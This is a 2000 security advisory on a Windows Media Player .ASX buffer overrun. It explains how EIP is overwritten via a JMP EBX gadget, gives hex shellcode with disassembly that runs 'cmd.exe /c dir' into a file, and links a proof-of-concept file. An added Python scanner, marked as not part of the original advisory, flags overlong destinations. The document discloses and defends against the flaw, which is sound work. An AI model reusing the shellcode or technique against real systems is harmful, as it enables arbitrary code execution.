Title: Windows 2000 .ASX Buffer Overrun
Released by: @stake
Date: 23rd November 2000
                              @stake Inc.
                            www.atstake.com

                           Security Advisory

Advisory Name: Windows 2000 .ASX Buffer Overrun
 Release Date: 11/23/2000
  Application: Microsoft Windows Explorer with
               Microsoft Media Player v6.xx and
               Microsoft Media Player v7.xx.
     Platform: Windows 2000 SP1
     Severity: There is a buffer overflow condition that
               can result in execution of arbitrary code.
      Authors: Ollie Whitehouse [ollie@atstake.com]
Vendor Status: vendor has released patch
          Web: www.atstake.com/research/advisories/2000/a112300-1.txt

Overview:

Microsoft Windows Media Player (http://www.microsoft.com/) plays
streaming media files which have the extension .ASX. There is a buffer
overrun caused by the way that WMP deals with the .ASX file format when
using the Web View option in Windows Explorer (enabled by default). This
problem can allow the execution of arbitrary computer code.

One method of exploitation requires the user to save the .ASX file to
the local machine and navigate to it via Explorer. Single-clicking the
file causes Explorer to auto-preview the destination streaming media
file which is specified in the .ASX file. Passing an overly long
destination for this media file causes the buffer overrun to occur and
the arbitrary code to execute.

This is another good example of why attachments from unknown sources
should not be trusted, and of why systems/network administrators should
evaluate the types of attachments which are allowed to be passed to
users' desktops, even though they may not contain any executable code.
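
As an added illustration (not part of the @stake advisory), the Python
sketch below shows the kind of gateway check an administrator could apply
to .ASX attachments: it extracts each destination and flags any that is
overly long or contains non-printable bytes. The 260-character limit, the
function name scan_asx and the REF HREF / RefN= destination forms are
assumptions, since the advisory gives neither the buffer size nor the
file layout.

```python
import re

# Assumption: the advisory gives no buffer size, so the limit is a policy
# choice. 260 is Windows MAX_PATH; real stream URLs are rarely longer.
MAX_DEST_LEN = 260

# ASX 3.0 is XML-like but often not well-formed, so match tags leniently
# instead of using an XML parser. Captures the tag name and its HREF value.
_HREF_RE = re.compile(
    r"<\s*(\w+)[^>]*?\bhref\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE)
# Older ASX redirector files use INI-style "RefN=destination" lines.
_INI_REF_RE = re.compile(r"^\s*(Ref\d+)\s*=\s*(.*?)\s*$",
                         re.IGNORECASE | re.MULTILINE)


def scan_asx(data: bytes, max_len: int = MAX_DEST_LEN):
    """Return (source, length, reason) findings for one .ASX file's bytes."""
    text = data.decode("latin-1")  # lossless, so raw bytes stay visible
    dests = [(m.group(1).upper(), m.group(2) or m.group(3) or m.group(4) or "")
             for m in _HREF_RE.finditer(text)]
    dests += [(m.group(1), m.group(2)) for m in _INI_REF_RE.finditer(text)]
    findings = []
    for source, dest in dests:
        if len(dest) > max_len:
            findings.append((source, len(dest), "destination too long"))
        elif any(not 0x20 <= ord(c) <= 0x7E for c in dest):
            findings.append((source, len(dest), "non-printable bytes"))
    return findings


# Constructed samples (not the advisory's proof-of-concept file).
BENIGN = (b'<ASX version="3.0"><ENTRY>'
          b'<REF HREF="http://media.example.com/clip.asf"/></ENTRY></ASX>')
OVERLONG = (b'<ASX version="3.0"><ENTRY><REF HREF="http://'
            + b"A" * 4000 + b'"/></ENTRY></ASX>')
LEGACY = b"[Reference]\r\nRef1=http://media.example.com/" + b"B" * 600 + b"\r\n"
BINARY = b'<asx><entry><ref href="http://x.example/\x01\xfe\xff"></entry></asx>'

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN), ("overlong", OVERLONG),
                       ("legacy", LEGACY), ("binary", BINARY)]:
        print(name, scan_asx(blob) or "clean")
```

A check like this complements the vendor patch; it does not replace it.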



There are other methods of exploitation which could allow .ASX files to be
opened automatically when a user visits a malicious web site.  This can be
prevented by configuring Internet Explorer not to run ActiveX controls.

Proof of Concept:

The following file once uncompressed contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within
Explorer with a single click, it will cause Microsoft Explorer to create a
file in the root of C: called !test!. This file will contain a directory
listing of the current working directory when the proof of concept is
executed. Once this proof of concept is executed it will require
Explorer.exe to be restarted.

This example has been hardcoded to work with Windows 2000 (SP1) and
MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack
specific is that the code is randomly located on the stack (so EIP cannot
be pointed directly to the location of the arbitrary code); EBX is located
4 bytes before EIP. The example overwrites EIP with the address of JMP EBX
(FF E2, this instruction is contained in kernel32 and thus static).  This
in turn then tries to execute the value at EBX (which contains NOPs),
then EIP (luckily this does not contain any code which alters or stops
program flow) and then finally executes the arbitrary code placed on the
stack.  The assembly code which is executed by this example at this point
is contained at the end of this advisory. Within the ASX file the example
code is contained at offset 00005ce4h.

Proof of concept ASX File:

An ASX file which contains the problem is contained in this .zip file:

 http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

<----------
[Byte Code]          [Assembly]
90                   nop
8B DC                mov         ebx,esp
8B E3                mov         esp,ebx
53                   push        ebx
8B DC                mov         ebx,esp
33 FF                xor         edi,edi

57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi

C6 43 E9 63          mov         byte ptr [ebx-17h],63h
C6 43 EA 6D          mov         byte ptr [ebx-16h],6Dh
C6 43 EB 64          mov         byte ptr [ebx-15h],64h
C6 43 EC 2E          mov         byte ptr [ebx-14h],2Eh
C6 43 ED 65          mov         byte ptr [ebx-13h],65h
C6 43 EE 78          mov         byte ptr [ebx-12h],78h
C6 43 EF 65          mov         byte ptr [ebx-11h],65h
C6 43 F0 2F          mov         byte ptr [ebx-10h],2Fh
C6 43 F1 63          mov         byte ptr [ebx-0Fh],63h
C6 43 F2 64          mov         byte ptr [ebx-0Eh],64h
C6 43 F3 69          mov         byte ptr [ebx-0Dh],69h
C6 43 F4 72          mov         byte ptr [ebx-0Ch],72h
C6 43 F5 3E          mov         byte ptr [ebx-0Bh],3Eh
C6 43 F6 63          mov         byte ptr [ebx-0Ah],63h
C6 43 F7 3A          mov         byte ptr [ebx-9],3Ah
C6 43 F8 5C          mov         byte ptr [ebx-8],5Ch
C6 43 F9 21          mov         byte ptr [ebx-7],21h
C6 43 FA 74          mov         byte ptr [ebx-6],74h
C6 43 FB 65          mov         byte ptr [ebx-5],65h
C6 43 FC 73          mov         byte ptr [ebx-4],73h
C6 43 FD 74          mov         byte ptr [ebx-3],74h
C6 43 FE 21          mov         byte ptr [ebx-2],21h

B8 AD AA 01 78       mov         eax,7801AAADh
50                   push        eax
8D 43 E9             lea         eax,[ebx-17h]
50                   push        eax
FF 53 E4             call        dword ptr [ebx-1Ch]
56                   push        esi

BB 2D F3 E8 77       mov         ebx,77E8F32Dh
FF D3                call        ebx
C3                   ret
<----------

Vendor Response:

Microsoft has released a security bulletin describing the issue:

 http://www.microsoft.com/technet/security/bulletin/MS00-090.asp

Microsoft has released patches for Windows Media Player:

 Windows Media Player 6.4:
 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

 Windows Media Player 7:
 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067

Recommendation:

The best solution is to install the vendor patch for your version of the
media player.  This solves this specific problem.

In general, unless you need to run ActiveX controls, it is a good idea to
configure Internet Explorer not to run them.  At the very least you can
configure IE to not run ActiveX controls in the Internet Security Zone.
It doesn't matter whether the controls are signed or not.  As you can see
from this advisory even signed controls can have security problems.

Of course, never trust attachments from unknown sources, even data files
such as the .ASX files discussed in this advisory.

For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.
